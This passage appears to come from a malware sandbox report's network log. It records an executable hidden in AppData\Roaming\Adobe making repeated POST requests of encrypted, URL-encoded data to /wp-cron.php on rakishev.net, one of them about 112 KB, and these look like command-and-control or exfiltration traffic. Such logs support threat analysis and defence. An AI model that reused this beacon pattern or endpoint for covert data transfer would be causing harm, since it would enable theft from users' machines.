PGX/9wchO/gwyxfwdETq1h5OjlvJwN/5gmHdc0y/yJB%2BU/QDsqyZDNRtX2fsf%2Bn2Gme4MEVxCzoguk6tlNfK7LsLnWx2bzp47kfTsmVvnys7V/Soq90UjSEMCHRLsXKdE7lew93LPBA9iQrJVd4ckXyJNdIOQvh1w33FNm3IXGlxshlx2gCboSslIHObg6Tr2g8c31wJT8kJojbUrU0hhCBaCjXY7UIOadgttcmf2jP6s5/hwBb2tXMGP/Y
2023-10-03 20:38:10 UTC	3971	OUT	Data Raw: 5a Data Ascii: Z
2023-10-03 20:38:10 UTC	3971	OUT	Data Raw: 53 43 70 7a 52 78 73 38 56 4c 65 4f 4a 64 76 75 42 4c 44 67 79 2f 62 65 65 77 6a 56 4f 4d 6f 63 4c 66 75 7a 78 78 48 2f 32 52 64 59 41 4f 73 67 41 35 25 32 42 4c 6e 35 33 76 33 68 66 47 57 44 73 68 4b 70 79 56 50 38 72 46 52 4c 6c 58 73 79 64 33 65 61 73 36 66 6e 33 6f 49 4f 46 6a 47 25 32 42 6d 63 61 68 4f 41 78 4e 5a 72 53 6e 38 69 61 4b 4d 55 25 32 42 2f 57 77 68 32 7a 79 78 66 56 72 4f 37 70 56 69 63 37 44 67 49 68 42 53 67 4d 64 44 75 68 76 51 35 4d 4f 69 75 4b 4b 58 47 57 78 57 4a 4a 56 50 32 53 73 50 39 4a 55 55 59 43 6d 75 4f 41 61 66 61 6e 36 35 57 48 6b 4b 31 75 35 43 4e 4e 7a 42 31 64 39 2f 45 32 31 6c 6e 59 38 42 55 65 4b 69 4d 49 6c 57 30 47 35 6f 51 4a 56 44 75 34 46 77 6f 56 76 43 46 37 33 34 64 44 31 49 76 30 55 79 72 45 6d 42 6f 6d 6e 71 Data Ascii: SCpzRxs8VLeOJdvuBLDgy/beewjVOMocLfuzxxH/2RdYAOsgA5%2BLn53v3hfGWDshKpyVP8rFRLlXsyd3eas6fn3oIOFjG%2BmcahOAxNZrSn8iaKMU%2B/Wwh2zyxfVrO7pVic7DgIhBSgMdDuhvQ5MOiuKKXGWxWJJVP2SsP9JUUYCmuOAafan65WHkK1u5CNNzB1d9/E21lnY8BUeKiMIlW0G5oQJVDu4FwoVvCF734dD1Iv0UyrEmBomnq
2023-10-03 20:38:10 UTC	3987	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:38:10 UTC	3987	OUT	Data Raw: 4d 79 62 46 59 48 6d 72 49 37 42 6c 37 31 45 46 6f 6b 54 31 6c 47 54 66 78 4f 69 36 67 7a 77 65 64 56 41 51 63 54 54 62 35 51 49 71 70 38 44 76 74 58 30 69 63 62 2f 72 34 55 52 30 6c 44 39 59 69 59 25 32 42 57 48 37 55 35 37 53 6e 45 52 43 42 48 4e 47 32 39 38 4d 66 70 64 25 32 42 67 64 59 71 54 78 5a 6f 79 31 32 55 2f 6f 68 53 6f 74 35 6b 41 6c 35 68 39 64 4d 77 64 34 35 42 36 74 48 39 42 53 76 36 7a 52 37 72 37 63 59 44 70 67 4c 53 4c 45 73 2f 4c 25 32 42 72 36 37 71 65 49 7a 34 44 6f 4f 4e 6b 77 31 43 46 2f 47 72 6e 78 41 32 63 6f 47 66 59 32 41 4c 47 42 51 66 4c 4b 58 52 39 49 54 50 64 6c 71 53 61 74 41 78 53 6d 33 55 56 56 47 61 6e 34 34 48 6a 50 74 64 59 73 6a 70 46 63 4f 4f 41 51 4f 30 25 32 42 64 76 44 33 41 61 62 48 54 67 5a 51 4d 4c 4b 34 76 4f Data Ascii: MybFYHmrI7Bl71EFokT1lGTfxOi6gzwedVAQcTTb5QIqp8DvtX0icb/r4UR0lD9YiY%2BWH7U57SnERCBHNG298Mfpd%2BgdYqTxZoy12U/ohSot5kAl5h9dMwd45B6tH9BSv6zR7r7cYDpgLSLEs/L%2Br67qeIz4DoONkw1CF/GrnxA2coGfY2ALGBQfLKXR9ITPdlqSatAxSm3UVVGan44HjPtdYsjpFcOOAQO0%2BdvD3AabHTgZQMLK4vO
2023-10-03 20:38:10 UTC	4003	OUT	Data Raw: 61 Data Ascii: a
2023-10-03 20:38:10 UTC	4003	OUT	Data Raw: 63 79 4e 32 75 32 35 64 57 5a 66 53 55 73 30 54 64 59 73 47 7a 49 45 6d 36 63 4c 39 4d 54 36 6a 4d 4a 4b 78 35 49 71 35 30 77 7a 47 63 77 77 50 34 78 76 41 30 2f 64 46 57 45 55 61 64 53 38 75 65 6f 67 32 4d 6e 61 50 48 6b 52 65 73 58 71 48 57 69 25 32 42 73 4f 4f 46 41 67 66 46 6f 41 78 2f 38 5a 37 4c 4f 34 75 51 55 4d 55 4c 2f 47 4f 74 66 54 7a 5a 78 68 52 2f 56 72 36 42 46 78 63 78 41 30 46 67 35 4c 72 70 51 65 55 69 55 59 33 79 42 31 4e 73 72 25 32 42 72 6b 58 61 48 73 59 65 4e 64 5a 6b 6c 62 6d 4e 79 73 6f 31 52 4d 4c 54 33 4a 61 54 25 32 42 46 70 37 69 77 49 33 78 56 54 67 51 6d 78 37 4c 46 58 48 31 64 59 41 2f 69 35 43 72 4a 43 65 4d 76 79 79 75 2f 34 61 69 63 76 6b 70 76 66 50 48 73 42 4d 55 32 75 41 61 48 79 77 66 65 34 4b 63 54 35 66 69 68 44 71 Data Ascii: cyN2u25dWZfSUs0TdYsGzIEm6cL9MT6jMJKx5Iq50wzGcwwP4xvA0/dFWEUadS8ueog2MnaPHkResXqHWi%2BsOOFAgfFoAx/8Z7LO4uQUMUL/GOtfTzZxhR/Vr6BFxcxA0Fg5LrpQeUiUY3yB1Nsr%2BrkXaHsYeNdZklbmNyso1RMLT3JaT%2BFp7iwI3xVTgQmx7LFXH1dYA/i5CrJCeMvyyu/4aicvkpvfPHsBMU2uAaHywfe4KcT5fihDq
2023-10-03 20:38:10 UTC	4019	OUT	Data Raw: 45 Data Ascii: E
2023-10-03 20:38:10 UTC	4019	OUT	Data Raw: 7a 39 50 31 5a 31 36 37 35 63 4c 45 50 42 33 53 49 66 35 75 47 79 6e 4a 36 5a 37 4c 44 6d 54 58 47 6d 63 46 42 53 4e 52 46 74 4b 7a 52 49 58 31 66 4c 38 31 61 75 43 52 34 58 47 50 4b 41 5a 43 57 6f 4f 75 4c 5a 6d 59 6f 47 45 78 6d 69 76 4d 6d 25 32 42 69 68 65 65 43 30 41 52 50 45 44 46 4b 33 6f 67 58 6f 64 47 49 73 57 45 4d 6d 79 35 74 44 44 2f 79 46 44 44 41 74 49 7a 62 6a 74 69 58 61 4d 6b 56 54 43 69 68 6a 39 59 75 36 30 43 67 46 39 36 6d 4e 37 77 53 4b 46 50 63 6a 52 45 48 75 4d 7a 6c 51 4f 4c 73 59 34 33 75 4f 4f 47 66 72 63 54 61 69 65 32 37 4b 77 6c 6f 46 5a 7a 7a 77 6f 73 44 48 34 35 42 78 30 62 35 79 52 4f 69 78 41 44 61 77 47 59 67 49 46 55 44 48 35 64 6e 4f 54 4d 70 74 74 4c 69 33 51 69 71 78 38 5a 55 32 4e 6d 4f 59 67 2f 49 38 41 38 76 66 37 Data Ascii: z9P1Z1675cLEPB3SIf5uGynJ6Z7LDmTXGmcFBSNRFtKzRIX1fL81auCR4XGPKAZCWoOuLZmYoGExmivMm%2BiheeC0ARPEDFK3ogXodGIsWEMmy5tDD/yFDDAtIzbjtiXaMkVTCihj9Yu60CgF96mN7wSKFPcjREHuMzlQOLsY43uOOGfrcTaie27KwloFZzzwosDH45Bx0b5yROixADawGYgIFUDH5dnOTMpttLi3Qiqx8ZU2NmOYg/I8A8vf7
2023-10-03 20:38:11 UTC	4035	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:38:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9NKfCAAmAcZB2jjtnUpClX0HRm4qi93HdC%2BBB4dqGgKiI8l12dYk%2BZAsGrjBMSAy3Oslhca61Bc%2BgQpq%2BKLke5FDFrVKHYYMLthDY2YKOorIaZ7lnHQGoMMKR9zHqJ4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fcbb18fb57dc-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.4	49899	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:38:10 UTC	3923	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 328 Expect: 100-continue
2023-10-03 20:38:10 UTC	3923	IN	HTTP/1.1 100 Continue
2023-10-03 20:38:10 UTC	3923	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:38:10 UTC	3923	OUT	Data Raw: 3d 72 71 36 35 62 59 64 34 75 48 47 65 6d 48 70 63 48 6b 33 37 67 56 78 59 33 46 33 4a 4b 57 42 25 32 42 2f 4c 69 67 6f 6e 4f 76 67 38 5a 42 71 4c 72 61 73 59 71 36 77 6f 78 63 33 6a 55 38 6c 72 48 76 54 4a 35 42 33 34 57 25 32 42 7a 78 4b 6e 64 44 43 66 6c 61 73 54 51 6d 69 32 38 33 6f 55 38 33 77 55 52 34 32 46 33 6c 46 25 32 42 4a 63 32 61 25 32 42 43 6d 6b 48 68 31 44 68 63 37 54 36 25 32 42 6c 47 34 64 39 4f 53 54 4f 69 39 41 4e 4b 6d 7a 69 7a 73 39 4a 34 75 4f 70 38 75 31 32 78 58 43 35 6e 58 36 59 66 2f 38 46 72 37 53 73 57 59 56 6e 6e 36 47 65 54 61 6b 56 75 6e 31 25 32 42 79 61 61 46 63 77 5a 54 66 56 4b 39 51 4b 58 34 71 4e 2f 30 2f 61 47 4e 6e 64 45 38 59 65 6f 33 70 43 63 67 45 63 43 4e 4c 44 53 43 63 39 64 42 38 75 62 68 25 32 42 77 35 69 53 Data Ascii: =rq65bYd4uHGemHpcHk37gVxY3F3JKWB%2B/LigonOvg8ZBqLrasYq6woxc3jU8lrHvTJ5B34W%2BzxKndDCflasTQmi283oU83wUR42F3lF%2BJc2a%2BCmkHh1Dhc7T6%2BlG4d9OSTOi9ANKmzizs9J4uOp8u12xXC5nX6Yf/8Fr7SsWYVnn6GeTakVun1%2ByaaFcwZTfVK9QKX4qN/0/aGNndE8Yeo3pCcgEcCNLDSCc9dB8ubh%2Bw5iS
2023-10-03 20:38:10 UTC	4034	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:38:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JNlcZm61Xuyw729KWT3LoWD2GwgO3UgaLaEvlH20wpDcAftk%2BEQRvB%2FXurEh4S3YZqQRbvUnvDRVkzQe%2FbXNtwdq336pIcPGH8PuETsLANL8gGB6KWEjiIagTpnuBKk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fcbb0add12c9-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.4	49900	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:38:10 UTC	3923	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 280 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:38:10 UTC	4034	IN	HTTP/1.1 100 Continue
2023-10-03 20:38:10 UTC	4034	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:38:10 UTC	4034	OUT	Data Raw: 3d 6b 45 42 35 7a 77 54 78 44 74 45 41 6f 59 7a 46 54 62 6f 55 4d 73 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 45 69 7a 62 49 39 79 6a 30 44 47 55 45 5a 6e 61 61 67 47 73 52 79 72 70 58 67 59 6c 67 44 4c 42 4d 6c 71 76 45 67 4b 25 32 42 47 75 55 6a 53 45 75 30 73 73 66 4f 62 54 47 61 68 6f 46 59 6d 5a 52 37 44 66 4a 71 75 4d 4c 6f 49 47 58 74 4c 39 73 56 67 41 6f 64 42 38 65 58 74 43 39 7a 2f 44 44 66 5a 79 4a 47 72 46 30 44 46 70 4f 36 75 54 78 2f 45 52 45 34 69 37 64 25 32 42 62 4d 30 49 5a 73 34 41 44 6b 44 70 33 59 6d 59 44 35 37 38 25 32 42 56 49 35 47 25 32 42 39 47 58 78 63 4b 63 52 72 38 7a 65 6d Data Ascii: =kEB5zwTxDtEAoYzFTboUMsNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJREizbI9yj0DGUEZnaagGsRyrpXgYlgDLBMlqvEgK%2BGuUjSEu0ssfObTGahoFYmZR7DfJquMLoIGXtL9sVgAodB8eXtC9z/DDfZyJGrF0DFpO6uTx/ERE4i7d%2BbM0IZs4ADkDp3YmYD578%2BVI5G%2B9GXxcKcRr8zem
2023-10-03 20:38:10 UTC	4035	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:38:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aYL1fTGx6SWkUT0tgB7tbmKZ4sYfVxRJFB5HjPo8wYPne4UKiQuqRCru0rKJjY7ipEYyM5lJ7vsNPLQ5VabzeDVIJJNXFM9qee4R0J%2Fr4gH68cF1bJtmfM32OoYYUCg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fcbb3bce177b-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.4	49903	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:38:38 UTC	4036	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 280 Expect: 100-continue
2023-10-03 20:38:39 UTC	4036	IN	HTTP/1.1 100 Continue
2023-10-03 20:38:39 UTC	4036	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:38:39 UTC	4036	OUT	Data Raw: 3d 6b 45 42 35 7a 77 54 78 44 74 45 41 6f 59 7a 46 54 62 6f 55 4d 73 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 45 69 7a 62 49 39 79 6a 30 44 47 55 45 5a 6e 61 61 67 47 73 52 79 72 70 58 67 59 6c 67 44 4c 42 4d 6c 71 76 45 67 4b 25 32 42 47 75 55 6a 53 45 75 30 73 73 66 4f 62 54 47 61 68 6f 46 59 6d 5a 52 37 44 66 4a 71 75 4d 4c 6f 49 47 58 74 4c 39 73 56 67 41 6f 64 42 38 65 58 74 43 39 7a 2f 44 44 66 5a 79 4a 47 72 46 30 44 46 70 4f 36 75 54 78 2f 45 52 45 34 69 37 64 25 32 42 62 4d 30 49 5a 73 34 41 44 6b 44 70 33 59 6d 59 44 35 37 38 25 32 42 56 49 35 47 25 32 42 39 47 58 78 63 4b 63 52 72 38 7a 65 6d Data Ascii: =kEB5zwTxDtEAoYzFTboUMsNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJREizbI9yj0DGUEZnaagGsRyrpXgYlgDLBMlqvEgK%2BGuUjSEu0ssfObTGahoFYmZR7DfJquMLoIGXtL9sVgAodB8eXtC9z/DDfZyJGrF0DFpO6uTx/ERE4i7d%2BbM0IZs4ADkDp3YmYD578%2BVI5G%2B9GXxcKcRr8zem
2023-10-03 20:38:39 UTC	4037	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:38:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BUOvSFOyykhzfRYUNrmVEJ6kzKMPTqDxjbArBIbcWwsSQu3ExqWlsjpH4mQSAY5UcSmtstnW5SZpef5IePL5sfktIMVhHCG%2BY%2Bl%2B%2BoH2tZmFJE6390gGXPZfUxbxYaM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fd6e0f535a21-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.4	49904	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:38:38 UTC	4036	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 326 Expect: 100-continue
2023-10-03 20:38:39 UTC	4037	IN	HTTP/1.1 100 Continue
2023-10-03 20:38:39 UTC	4037	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:38:39 UTC	4037	OUT	Data Raw: 3d 72 71 36 35 62 59 64 34 75 48 47 65 6d 48 70 63 48 6b 33 37 67 56 78 59 33 46 33 4a 4b 57 42 25 32 42 2f 4c 69 67 6f 6e 4f 76 67 38 5a 42 71 4c 72 61 73 59 71 36 77 6f 78 63 33 6a 55 38 6c 72 48 76 54 4a 35 42 33 34 57 25 32 42 7a 78 4b 6e 64 44 43 66 6c 61 73 54 51 68 66 52 54 4a 71 35 66 32 43 55 25 32 42 52 6e 42 5a 58 31 6a 43 52 73 47 6a 5a 32 2f 59 6e 6b 56 61 63 37 54 36 25 32 42 6c 47 34 64 39 4f 53 54 4f 69 39 41 4e 4b 6d 7a 69 7a 73 39 4a 34 75 4f 70 38 75 31 32 78 58 43 35 6e 58 36 59 66 2f 38 46 72 37 53 73 57 59 56 6e 6e 36 47 65 54 61 6b 56 75 6e 31 25 32 42 79 61 61 46 63 77 5a 54 66 56 4b 39 51 4b 58 34 71 4e 2f 30 2f 61 47 4e 6e 64 45 38 59 65 6f 33 70 43 63 67 45 63 43 4e 4c 44 53 43 63 39 64 42 38 75 62 68 25 32 42 77 35 69 53 6a 79 Data Ascii: =rq65bYd4uHGemHpcHk37gVxY3F3JKWB%2B/LigonOvg8ZBqLrasYq6woxc3jU8lrHvTJ5B34W%2BzxKndDCflasTQhfRTJq5f2CU%2BRnBZX1jCRsGjZ2/YnkVac7T6%2BlG4d9OSTOi9ANKmzizs9J4uOp8u12xXC5nX6Yf/8Fr7SsWYVnn6GeTakVun1%2ByaaFcwZTfVK9QKX4qN/0/aGNndE8Yeo3pCcgEcCNLDSCc9dB8ubh%2Bw5iSjy
2023-10-03 20:38:39 UTC	4038	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:38:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=a3jtuEZUH%2BsE4Sp04vhc1Fyqe9u6O5D0AiqHCIi4Umbx0Ngb7FMrWMIeqScN3ByAGsGTsqeGRJSsIaYMnx6uUqnT%2B%2BXW05dyKybTOslPKsPtF1uAByMaWKPomoUtwLE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fd6f0cb557af-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.4	49905	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:38:40 UTC	4038	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 112878 Expect: 100-continue
2023-10-03 20:38:40 UTC	4038	IN	HTTP/1.1 100 Continue
2023-10-03 20:38:40 UTC	4038	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:38:40 UTC	4038	OUT	Data Raw: 3d 6d 77 6a 4f 70 4f 61 59 65 36 34 70 42 63 51 30 61 54 65 33 4d 4d 52 39 51 47 75 4e 6b 34 32 4e 55 4d 48 79 62 71 7a 58 75 78 67 6a 44 38 4d 65 61 71 4c 6e 49 56 54 6c 68 34 37 49 6f 71 4a 54 59 78 48 46 7a 66 2f 5a 51 74 70 70 78 37 4d 42 47 71 70 2f 25 32 42 79 71 35 4b 71 55 49 6f 66 47 55 42 7a 6a 46 35 72 50 77 67 54 61 6c 6e 69 5a 2f 59 63 32 6d 41 49 49 4d 72 39 62 78 66 43 58 68 76 45 49 48 32 6f 48 34 52 57 41 6a 32 37 4a 57 45 7a 42 58 46 78 58 36 36 71 31 4a 69 4e 41 54 48 33 79 31 39 47 6e 44 30 30 43 77 45 44 73 37 4b 32 61 47 77 57 41 68 6f 73 62 51 54 43 61 77 56 6b 2f 56 6c 41 58 78 4a 4d 4b 33 64 53 4f 78 35 76 59 59 79 46 4f 7a 7a 75 79 78 66 39 77 57 55 4d 43 52 35 4c 69 34 38 6a 25 32 42 69 68 79 5a 59 6c 66 46 73 48 65 65 79 36 70 Data Ascii: =mwjOpOaYe64pBcQ0aTe3MMR9QGuNk42NUMHybqzXuxgjD8MeaqLnIVTlh47IoqJTYxHFzf/ZQtppx7MBGqp/%2Byq5KqUIofGUBzjF5rPwgTalniZ/Yc2mAIIMr9bxfCXhvEIH2oH4RWAj27JWEzBXFxX66q1JiNATH3y19GnD00CwEDs7K2aGwWAhosbQTCawVk/VlAXxJMK3dSOx5vYYyFOzzuyxf9wWUMCR5Li48j%2BihyZYlfFsHeey6p
2023-10-03 20:38:40 UTC	4054	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:38:40 UTC	4054	OUT	Data Raw: 77 77 54 62 34 6e 47 79 43 35 73 75 71 61 57 6e 4c 49 67 74 6d 72 65 54 44 56 25 32 42 67 68 47 2f 31 63 57 55 51 66 75 36 62 56 6a 56 45 47 45 42 4a 6d 63 52 69 6d 43 33 35 6d 44 6f 47 77 4f 39 51 64 46 47 65 52 30 70 64 4d 56 5a 4e 25 32 42 73 4d 52 46 4f 75 57 41 44 39 2f 79 4a 57 48 62 36 71 35 4d 32 36 75 33 31 45 56 4a 35 35 6b 69 46 6d 50 63 76 6d 4d 59 51 4d 57 69 46 59 25 32 42 68 67 25 32 42 4d 6a 73 55 32 79 62 78 6e 48 79 37 74 78 48 78 4b 41 71 64 73 50 6e 48 63 67 2f 2f 4a 41 69 53 77 33 32 63 63 41 72 4d 70 61 68 68 57 74 59 31 50 77 52 50 64 4f 71 70 62 4d 71 74 74 4e 59 4d 55 6a 77 6a 34 4e 30 30 52 31 39 76 47 6d 67 5a 53 47 4d 63 4c 2f 64 44 6c 6a 79 68 75 6f 48 44 70 42 78 68 6c 45 6d 37 48 35 34 58 67 73 7a 51 42 66 47 35 70 50 35 44 Data Ascii: wwTb4nGyC5suqaWnLIgtmreTDV%2BghG/1cWUQfu6bVjVEGEBJmcRimC35mDoGwO9QdFGeR0pdMVZN%2BsMRFOuWAD9/yJWHb6q5M26u31EVJ55kiFmPcvmMYQMWiFY%2Bhg%2BMjsU2ybxnHy7txHxKAqdsPnHcg//JAiSw32ccArMpahhWtY1PwRPdOqpbMqttNYMUjwj4N00R19vGmgZSGMcL/dDljyhuoHDpBxhlEm7H54XgszQBfG5pP5D
2023-10-03 20:38:40 UTC	4070	OUT	Data Raw: 37 Data Ascii: 7
2023-10-03 20:38:40 UTC	4070	OUT	Data Raw: 50 47 58 2f 39 77 63 68 4f 2f 67 77 79 78 66 77 64 45 54 71 31 68 35 4f 6a 6c 76 4a 77 4e 2f 35 67 6d 48 64 63 30 79 2f 79 4a 42 25 32 42 55 2f 51 44 73 71 79 5a 44 4e 52 74 58 32 66 73 66 25 32 42 6e 32 47 6d 65 34 4d 45 56 78 43 7a 6f 67 75 6b 36 74 6c 4e 66 4b 37 4c 73 4c 6e 57 78 32 62 7a 70 34 37 6b 66 54 73 6d 56 76 6e 79 73 37 56 2f 53 6f 71 39 30 55 6a 53 45 4d 43 48 52 4c 73 58 4b 64 45 37 6c 65 77 39 33 4c 50 42 41 39 69 51 72 4a 56 64 34 63 6b 58 79 4a 4e 64 49 4f 51 76 68 31 77 33 33 46 4e 6d 33 49 58 47 6c 78 73 68 6c 78 32 67 43 62 6f 53 73 6c 49 48 4f 62 67 36 54 72 32 67 38 63 33 31 77 4a 54 38 6b 4a 6f 6a 62 55 72 55 30 68 68 43 42 61 43 6a 58 59 37 55 49 4f 61 64 67 74 74 63 6d 66 32 6a 50 36 73 35 2f 68 77 42 62 32 74 58 4d 47 50 2f 59 Data Ascii: PGX/9wchO/gwyxfwdETq1h5OjlvJwN/5gmHdc0y/yJB%2BU/QDsqyZDNRtX2fsf%2Bn2Gme4MEVxCzoguk6tlNfK7LsLnWx2bzp47kfTsmVvnys7V/Soq90UjSEMCHRLsXKdE7lew93LPBA9iQrJVd4ckXyJNdIOQvh1w33FNm3IXGlxshlx2gCboSslIHObg6Tr2g8c31wJT8kJojbUrU0hhCBaCjXY7UIOadgttcmf2jP6s5/hwBb2tXMGP/Y
2023-10-03 20:38:40 UTC	4086	OUT	Data Raw: 5a Data Ascii: Z
2023-10-03 20:38:40 UTC	4086	OUT	Data Raw: 53 43 70 7a 52 78 73 38 56 4c 65 4f 4a 64 76 75 42 4c 44 67 79 2f 62 65 65 77 6a 56 4f 4d 6f 63 4c 66 75 7a 78 78 48 2f 32 52 64 59 41 4f 73 67 41 35 25 32 42 4c 6e 35 33 76 33 68 66 47 57 44 73 68 4b 70 79 56 50 38 72 46 52 4c 6c 58 73 79 64 33 65 61 73 36 66 6e 33 6f 49 4f 46 6a 47 25 32 42 6d 63 61 68 4f 41 78 4e 5a 72 53 6e 38 69 61 4b 4d 55 25 32 42 2f 57 77 68 32 7a 79 78 66 56 72 4f 37 70 56 69 63 37 44 67 49 68 42 53 67 4d 64 44 75 68 76 51 35 4d 4f 69 75 4b 4b 58 47 57 78 57 4a 4a 56 50 32 53 73 50 39 4a 55 55 59 43 6d 75 4f 41 61 66 61 6e 36 35 57 48 6b 4b 31 75 35 43 4e 4e 7a 42 31 64 39 2f 45 32 31 6c 6e 59 38 42 55 65 4b 69 4d 49 6c 57 30 47 35 6f 51 4a 56 44 75 34 46 77 6f 56 76 43 46 37 33 34 64 44 31 49 76 30 55 79 72 45 6d 42 6f 6d 6e 71 Data Ascii: SCpzRxs8VLeOJdvuBLDgy/beewjVOMocLfuzxxH/2RdYAOsgA5%2BLn53v3hfGWDshKpyVP8rFRLlXsyd3eas6fn3oIOFjG%2BmcahOAxNZrSn8iaKMU%2B/Wwh2zyxfVrO7pVic7DgIhBSgMdDuhvQ5MOiuKKXGWxWJJVP2SsP9JUUYCmuOAafan65WHkK1u5CNNzB1d9/E21lnY8BUeKiMIlW0G5oQJVDu4FwoVvCF734dD1Iv0UyrEmBomnq
2023-10-03 20:38:40 UTC	4102	OUT	Data Raw: 34 Data Ascii: 4
